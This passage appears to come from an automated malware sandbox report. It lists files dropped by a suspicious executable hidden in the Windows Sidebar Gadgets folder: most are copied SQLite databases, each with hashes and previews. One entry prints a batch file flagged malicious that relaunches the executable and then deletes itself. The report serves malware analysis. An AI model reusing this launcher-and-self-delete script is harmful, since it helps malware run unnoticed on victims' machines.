                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\NVH1LkCViY

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\NaOziIAPNb

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Njsa28A9lP

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\NklnqjV0nw

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\NzITnmgLuB

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\OZLG1a95Jl

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\OlvJRWqRzk

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\OndEzNLOAu

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\OuNxqA4Zl2

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\OvKE4HZDlZ

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\P7B4dSI9QQ

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\PafD4QoBLz

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Q4DWtjmrgH

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Q9wTKLsd4W

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\QABvI2F7Ec

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\QF5sneTT5D

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\QFYDqjg5Ht

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\QWYGnjxtf3

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\QgDfm1tal9.bat

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):201
                                                                                                                                                                  Entropy (8bit):5.406541704113936
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:hCRLuVFOOr+DER5SMLDVK/SKOZG1wkn23fDhkhn:CuVEOCDEfSMk/Iftkh
                                                                                                                                                                  MD5:68C5B1DF81CE4054D3A260D70B5B7519
                                                                                                                                                                  SHA1:D113EC3617A40929B7E494E8AA2E91CDB6C0EEC4
                                                                                                                                                                  SHA-256:A2346543692CBBCF01F963B45E17267D05D8DBE66354C3F7B5FD2D1557096BF9
                                                                                                                                                                  SHA-512:BBD4246593D7FA5AA23079AC9A6C9B5B4F654766FD4DF435EEF3AFC9B42B592660E568AC2792DDD50EACFE83EF25E00E5E7FDE9838537BD66E662797AA4FCA3F
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files (x86)\windows sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\QgDfm1tal9.bat"

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\QhfyHbVwRZ

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
